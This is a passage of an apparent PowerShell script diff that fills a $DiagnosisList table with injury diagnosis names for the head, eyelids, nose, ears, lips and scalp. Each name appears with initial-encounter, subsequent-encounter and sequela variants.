unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right eyelid and periocular area","External constriction of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right eyelid and periocular area","External constriction of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right eyelid and periocular area","External constriction of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left eyelid and periocular area","External constriction of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left eyelid and periocular area","External constriction of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left eyelid and periocular area","External constriction of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified eyelid and periocular area","External constriction of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified eyelid and periocular area","External constriction of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified eyelid and periocular area","External constriction of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right eyelid and periocular area","Superficial foreign body of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right eyelid and periocular area","Superficial foreign body of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right eyelid and periocular area","Superficial foreign body of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left eyelid and periocular area","Superficial foreign body of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left eyelid and periocular area","Superficial foreign body of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left eyelid and periocular area","Superficial foreign body of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified eyelid and periocular area","Superficial foreign body of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified eyelid and periocular area","Superficial foreign body of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified eyelid and periocular area","Superficial foreign body of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right eyelid and periocular area","Insect bite (nonvenomous) of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right eyelid and periocular area","Insect bite (nonvenomous) of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right eyelid and periocular area","Insect bite (nonvenomous) of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left eyelid and periocular area","Insect bite (nonvenomous) of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left eyelid and periocular area","Insect bite (nonvenomous) of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left eyelid and periocular area","Insect bite (nonvenomous) of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified eyelid and periocular area","Insect bite (nonvenomous) of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified eyelid and periocular area","Insect bite (nonvenomous) of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified eyelid and periocular area","Insect bite (nonvenomous) of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right eyelid and periocular area","Other superficial bite of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right eyelid and periocular area","Other superficial bite of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right eyelid and periocular area","Other superficial bite of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left eyelid and periocular area","Other superficial bite of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left eyelid and periocular area","Other superficial bite of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left eyelid and periocular area","Other superficial bite of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified eyelid and periocular area","Other superficial bite of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified eyelid and periocular area","Other superficial bite of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified eyelid and periocular area","Other superficial bite of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of nose","Unspecified superficial injury of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of nose","Unspecified superficial injury of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of nose","Unspecified superficial injury of nose, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of nose","Abrasion of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of nose","Abrasion of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of nose","Abrasion of nose, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of nose","Blister (nonthermal) of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of nose","Blister (nonthermal) of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of nose","Blister (nonthermal) of nose, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of nose","Contusion of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of nose","Contusion of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of nose","Contusion of nose, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of nose","External constriction of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of nose","External constriction of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of nose","External constriction of nose, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of nose","Superficial foreign body of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of nose","Superficial foreign body of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of nose","Superficial foreign body of nose, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of nose","Insect bite (nonvenomous) of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of nose","Insect bite (nonvenomous) of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of nose","Insect bite (nonvenomous) of nose, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of nose","Other superficial bite of nose, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of nose","Other superficial bite of nose, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of nose","Other superficial bite of nose, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right ear","Unspecified superficial injury of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right ear","Unspecified superficial injury of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right ear","Unspecified superficial injury of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left ear","Unspecified superficial injury of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left ear","Unspecified superficial injury of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left ear","Unspecified superficial injury of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified ear","Unspecified superficial injury of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified ear","Unspecified superficial injury of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified ear","Unspecified superficial injury of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right ear","Abrasion of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right ear","Abrasion of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right ear","Abrasion of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left ear","Abrasion of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left ear","Abrasion of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left ear","Abrasion of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified ear","Abrasion of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified ear","Abrasion of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified ear","Abrasion of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right ear","Blister (nonthermal) of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right ear","Blister (nonthermal) of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right ear","Blister (nonthermal) of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left ear","Blister (nonthermal) of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left ear","Blister (nonthermal) of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left ear","Blister (nonthermal) of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified ear","Blister (nonthermal) of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified ear","Blister (nonthermal) of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified ear","Blister (nonthermal) of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right ear","Contusion of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right ear","Contusion of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right ear","Contusion of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left ear","Contusion of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left ear","Contusion of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left ear","Contusion of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ear","Contusion of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ear","Contusion of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified ear","Contusion of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right ear","External constriction of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right ear","External constriction of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right ear","External constriction of right ear, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left ear","External constriction of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left ear","External constriction of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left ear","External constriction of left ear, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified ear","External constriction of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified ear","External constriction of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified ear","External constriction of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right ear","Superficial foreign body of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right ear","Superficial foreign body of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right ear","Superficial foreign body of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left ear","Superficial foreign body of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left ear","Superficial foreign body of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left ear","Superficial foreign body of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified ear","Superficial foreign body of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified ear","Superficial foreign body of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified ear","Superficial foreign body of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right ear","Insect bite (nonvenomous) of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right ear","Insect bite (nonvenomous) of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right ear","Insect bite (nonvenomous) of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left ear","Insect bite (nonvenomous) of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left ear","Insect bite (nonvenomous) of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left ear","Insect bite (nonvenomous) of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified ear","Insect bite (nonvenomous) of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified ear","Insect bite (nonvenomous) of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified ear","Insect bite (nonvenomous) of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right ear","Other superficial bite of right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right ear","Other superficial bite of right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right ear","Other superficial bite of right ear, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left ear","Other superficial bite of left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left ear","Other superficial bite of left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left ear","Other superficial bite of left ear, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified ear","Other superficial bite of unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified ear","Other superficial bite of unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified ear","Other superficial bite of unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of lip","Unspecified superficial injury of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of lip","Unspecified superficial injury of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of lip","Unspecified superficial injury of lip, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of oral cavity","Unspecified superficial injury of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of oral cavity","Unspecified superficial injury of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of oral cavity","Unspecified superficial injury of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of lip","Abrasion of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of lip","Abrasion of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of lip","Abrasion of lip, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of oral cavity","Abrasion of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of oral cavity","Abrasion of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of oral cavity","Abrasion of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of lip","Blister (nonthermal) of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of lip","Blister (nonthermal) of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of lip","Blister (nonthermal) of lip, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of oral cavity","Blister (nonthermal) of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of oral cavity","Blister (nonthermal) of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of oral cavity","Blister (nonthermal) of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of lip","Contusion of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of lip","Contusion of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of lip","Contusion of lip, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of oral cavity","Contusion of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of oral cavity","Contusion of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of oral cavity","Contusion of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of lip","External constriction of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of lip","External constriction of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of lip","External constriction of lip, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of oral cavity","External constriction of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of oral cavity","External constriction of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of oral cavity","External constriction of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of lip","Superficial foreign body of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of lip","Superficial foreign body of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of lip","Superficial foreign body of lip, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of oral cavity","Superficial foreign body of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of oral cavity","Superficial foreign body of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of oral cavity","Superficial foreign body of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of lip","Insect bite (nonvenomous) of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of lip","Insect bite (nonvenomous) of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of lip","Insect bite (nonvenomous) of lip, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of oral cavity","Insect bite (nonvenomous) of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of oral cavity","Insect bite (nonvenomous) of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of oral cavity","Insect bite (nonvenomous) of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of lip","Other superficial bite of lip, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of lip","Other superficial bite of lip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of lip","Other superficial bite of lip, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of oral cavity","Other superficial bite of oral cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of oral cavity","Other superficial bite of oral cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of oral cavity","Other superficial bite of oral cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of other part of head","Unspecified superficial injury of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of other part of head","Unspecified superficial injury of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of other part of head","Unspecified superficial injury of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of other part of head","Abrasion of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of other part of head","Abrasion of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of other part of head","Abrasion of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of other part of head","Blister (nonthermal) of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of other part of head","Blister (nonthermal) of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of other part of head","Blister (nonthermal) of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of other part of head","Contusion of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other part of head","Contusion of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other part of head","Contusion of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of other part of head","External constriction of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of other part of head","External constriction of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of other part of head","External constriction of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of other part of head","Superficial foreign body of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of other part of head","Superficial foreign body of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of other part of head","Superficial foreign body of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of other part of head","Insect bite (nonvenomous) of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of other part of head","Insect bite (nonvenomous) of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of other part of head","Insect bite (nonvenomous) of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of other part of head","Other superficial bite of other part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of other part of head","Other superficial bite of other part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of other part of head","Other superficial bite of other part of head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified part of head","Unspecified superficial injury of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified part of head","Unspecified superficial injury of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified part of head","Unspecified superficial injury of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified part of head","Abrasion of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified part of head","Abrasion of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified part of head","Abrasion of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified part of head","Blister (nonthermal) of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified part of head","Blister (nonthermal) of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified part of head","Blister (nonthermal) of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of head","Contusion of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of head","Contusion of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified part of head","Contusion of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified part of head","External constriction of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified part of head","External constriction of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified part of head","External constriction of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified part of head","Superficial foreign body of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified part of head","Superficial foreign body of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified part of head","Superficial foreign body of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified part of head","Insect bite (nonvenomous) of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified part of head","Insect bite (nonvenomous) of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified part of head","Insect bite (nonvenomous) of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified part of head","Other superficial bite of unspecified part of head, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified part of head","Other superficial bite of unspecified part of head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified part of head","Other superficial bite of unspecified part of head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of scalp","Unspecified open wound of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of scalp","Unspecified open wound of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of scalp","Unspecified open wound of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of scalp","Laceration without foreign body of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of scalp","Laceration without foreign body of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of scalp","Laceration without foreign body of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of scalp","Laceration with foreign body of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of scalp","Laceration with foreign body of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of scalp","Laceration with foreign body of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of scalp","Puncture wound without foreign body of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of scalp","Puncture wound without foreign body of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of scalp","Puncture wound without foreign body of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of scalp","Puncture wound with foreign body of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of scalp","Puncture wound with foreign body of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of scalp","Puncture wound with foreign body of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of scalp","Open bite of scalp, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of scalp","Open bite of scalp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of scalp","Open bite of scalp, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right eyelid and periocular area","Unspecified open wound of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right eyelid and periocular area","Unspecified open wound of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right eyelid and periocular area","Unspecified open wound of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left eyelid and periocular area","Unspecified open wound of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left eyelid and periocular area","Unspecified open wound of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left eyelid and periocular area","Unspecified open wound of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified eyelid and periocular area","Unspecified open wound of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified eyelid and periocular area","Unspecified open wound of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified eyelid and periocular area","Unspecified open wound of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right eyelid and periocular area","Laceration without foreign body of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right eyelid and periocular area","Laceration without foreign body of right eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right eyelid and periocular area","Laceration without foreign body of right eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left eyelid and periocular area","Laceration without foreign body of left eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left eyelid and periocular area","Laceration without foreign body of left eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left eyelid and periocular area","Laceration without foreign body of left eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified eyelid and periocular area","Laceration without foreign body of unspecified eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified eyelid and periocular area","Laceration without foreign body of unspecified eyelid and periocular area, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified eyelid and periocular area","Laceration without foreign body of unspecified eyelid and periocular area, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right eyelid and periocular area","Laceration with foreign body of right eyelid and periocular area, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right eyelid and periocular 